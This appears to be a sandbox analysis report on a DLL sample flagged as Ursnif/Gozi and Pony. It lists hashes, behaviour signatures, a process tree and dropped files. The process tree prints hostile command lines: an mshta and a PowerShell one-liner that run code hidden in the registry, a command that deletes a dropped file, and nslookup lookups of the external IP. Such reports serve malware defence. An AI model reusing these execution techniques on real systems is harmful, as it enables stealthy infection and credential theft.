Analysis

  • max time kernel
    150s
  • max time network
    136s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    13-07-2020 16:55

General

  • Target

    434.dll

  • Size

    367KB

  • MD5

    7e9c8822be0f73073ce2cc5ef5a13c96

  • SHA1

    10b2f8667db53eaf1b85a209d9b80b834425167f

  • SHA256

    bd6840cc208517847e130db0c847e715ba80a88e210e6383b37c1d0381877ee5

  • SHA512

    120bfec74eed70dc19d7aff9ed8dc392616a6c652f4c7b3f642219c6d5203038e66cef65e67b79041b8653b65021e2402b3cfc0f3b6850afd1d13e2a03637118

Malware Config

Signatures

  • Checks whether UAC is enabled 3 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Suspicious behavior: EnumeratesProcesses 2022 IoCs
  • Suspicious use of AdjustPrivilegeToken 96 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 74 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Checks for installed software on the system 1 TTPs 7 IoCs
  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:2968
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\434.dll,#1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3820
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe C:\Users\Admin\AppData\Local\Temp\434.dll,#1
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3840
        • C:\Windows\SysWOW64\svchost.exe
          C:\Windows\System32\svchost.exe
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • Checks for installed software on the system
          PID:3828
          • C:\Windows\SysWOW64\cmd.exe
            cmd /K
            5⤵
              PID:1880
            • C:\Windows\SysWOW64\svchost.exe
              C:\Windows\System32\svchost.exe
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:68
            • C:\Users\Admin\AppData\Local\Temp\BN28C0.tmp
              C:\Users\Admin\AppData\Local\Temp\BN28C0.tmp
              5⤵
              • Executes dropped EXE
              PID:3324
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 652
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Program crash
            PID:2224
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2FFAFA40-C261-3936-44D3-167DB8B7AA01\\\Addrient'));if(!window.flag)close()</script>"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2420
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\2FFAFA40-C261-3936-44D3-167DB8B7AA01").appiness))
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:3408
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oiuycdv3\oiuycdv3.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:680
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D85.tmp" "c:\Users\Admin\AppData\Local\Temp\oiuycdv3\CSCB2B2CDD8A70745D7AD6E96D93E36FBE4.TMP"
              5⤵
                PID:3104
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c5zmxomj\c5zmxomj.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3524
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8EED.tmp" "c:\Users\Admin\AppData\Local\Temp\c5zmxomj\CSCE09D1983B3B1431FA063C5AEC854C5.TMP"
                5⤵
                  PID:3892
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\BN28C0.tmp"
            2⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:3720
            • C:\Windows\system32\PING.EXE
              ping localhost -n 5
              3⤵
              • Runs ping.exe
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              PID:2560
          • C:\Windows\system32\cmd.exe
            cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\80A.bi1"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3152
            • C:\Windows\system32\nslookup.exe
              nslookup myip.opendns.com resolver1.opendns.com
              3⤵
                PID:2680
            • C:\Windows\system32\cmd.exe
              cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\8AA.bi1"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3356
              • C:\Windows\system32\nslookup.exe
                nslookup myip.opendns.com resolver1.opendns.com
                3⤵
                  PID:2672
              • C:\Windows\system32\cmd.exe
                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8AA.bi1"
                2⤵
                  PID:2472
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80A.bi1"
                  2⤵
                    PID:2444
                  • C:\Program Files\Windows Mail\WinMail.exe
                    "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                    2⤵
                      PID:3920
                  • C:\Windows\System32\RuntimeBroker.exe
                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                    1⤵
                      PID:3340
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                      1⤵
                      • Checks whether UAC is enabled
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      • Modifies Internet Explorer settings
                      PID:3768
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3768 CREDAT:82945 /prefetch:2
                        2⤵
                        • Checks whether UAC is enabled
                        • Suspicious use of SetWindowsHookEx
                        • Modifies Internet Explorer settings
                        PID:664
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3768 CREDAT:82953 /prefetch:2
                        2⤵
                        • Checks whether UAC is enabled
                        • Suspicious use of SetWindowsHookEx
                        • Modifies Internet Explorer settings
                        PID:1312

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

                    • C:\Users\Admin\AppData\Local\Temp\80A.bi1

                    • C:\Users\Admin\AppData\Local\Temp\80A.bi1

                    • C:\Users\Admin\AppData\Local\Temp\8AA.bi1

                    • C:\Users\Admin\AppData\Local\Temp\8AA.bi1

                    • C:\Users\Admin\AppData\Local\Temp\BN28C0.tmp

                    • C:\Users\Admin\AppData\Local\Temp\BN28C0.tmp

                    • C:\Users\Admin\AppData\Local\Temp\RES8D85.tmp

                    • C:\Users\Admin\AppData\Local\Temp\RES8EED.tmp

                    • C:\Users\Admin\AppData\Local\Temp\c5zmxomj\c5zmxomj.dll

                    • C:\Users\Admin\AppData\Local\Temp\oiuycdv3\oiuycdv3.dll

                    • \??\c:\Users\Admin\AppData\Local\Temp\c5zmxomj\CSCE09D1983B3B1431FA063C5AEC854C5.TMP

                    • \??\c:\Users\Admin\AppData\Local\Temp\c5zmxomj\c5zmxomj.0.cs

                    • \??\c:\Users\Admin\AppData\Local\Temp\c5zmxomj\c5zmxomj.cmdline

                    • \??\c:\Users\Admin\AppData\Local\Temp\oiuycdv3\CSCB2B2CDD8A70745D7AD6E96D93E36FBE4.TMP

                    • \??\c:\Users\Admin\AppData\Local\Temp\oiuycdv3\oiuycdv3.0.cs

                    • \??\c:\Users\Admin\AppData\Local\Temp\oiuycdv3\oiuycdv3.cmdline

                    • memory/68-7-0x000000000BC00000-0x000000000BC12000-memory.dmp

                      Filesize

                      72KB

                    • memory/68-6-0x000000000BC01067-mapping.dmp

                    • memory/68-5-0x000000000BC00000-0x000000000BC12000-memory.dmp

                      Filesize

                      72KB

                    • memory/664-24-0x0000000000000000-mapping.dmp

                    • memory/680-27-0x0000000000000000-mapping.dmp

                    • memory/1312-25-0x0000000000000000-mapping.dmp

                    • memory/1880-4-0x0000000000000000-mapping.dmp

                    • memory/2224-20-0x00000000051D0000-0x00000000051D1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2224-16-0x0000000004850000-0x0000000004851000-memory.dmp

                      Filesize

                      4KB

                    • memory/2444-50-0x0000000000000000-mapping.dmp

                    • memory/2472-49-0x0000000000000000-mapping.dmp

                    • memory/2560-43-0x0000000000000000-mapping.dmp

                    • memory/2560-44-0x0000009974EC7000-mapping.dmp

                    • memory/2672-48-0x0000000000000000-mapping.dmp

                    • memory/2680-47-0x0000000000000000-mapping.dmp

                    • memory/3104-30-0x0000000000000000-mapping.dmp

                    • memory/3152-46-0x0000000000000000-mapping.dmp

                    • memory/3324-12-0x0000000001160000-0x0000000001161000-memory.dmp

                      Filesize

                      4KB

                    • memory/3324-8-0x0000000000000000-mapping.dmp

                    • memory/3324-11-0x0000000000D36000-0x0000000000D37000-memory.dmp

                      Filesize

                      4KB

                    • memory/3356-45-0x0000000000000000-mapping.dmp

                    • memory/3408-26-0x0000000000000000-mapping.dmp

                    • memory/3524-34-0x0000000000000000-mapping.dmp

                    • memory/3720-41-0x0000000000000000-mapping.dmp

                    • memory/3720-42-0x0000009EE35E5000-mapping.dmp

                    • memory/3828-1-0x0000000000400000-0x0000000000409000-memory.dmp

                      Filesize

                      36KB

                    • memory/3828-2-0x0000000000402960-mapping.dmp

                    • memory/3828-3-0x0000000000400000-0x0000000000409000-memory.dmp

                      Filesize

                      36KB

                    • memory/3840-23-0x0000000000A60000-0x0000000000A61000-memory.dmp

                      Filesize

                      4KB

                    • memory/3840-17-0x0000000000000000-mapping.dmp

                    • memory/3840-18-0x0000000000000000-mapping.dmp

                    • memory/3840-19-0x0000000000000000-mapping.dmp

                    • memory/3840-21-0x0000000000000000-mapping.dmp

                    • memory/3840-0-0x0000000000000000-mapping.dmp

                    • memory/3840-22-0x0000000000000000-mapping.dmp

                    • memory/3892-37-0x0000000000000000-mapping.dmp

                    • memory/3920-55-0x0000000000000000-mapping.dmp

                    • memory/3920-56-0x00000026A3E12000-mapping.dmp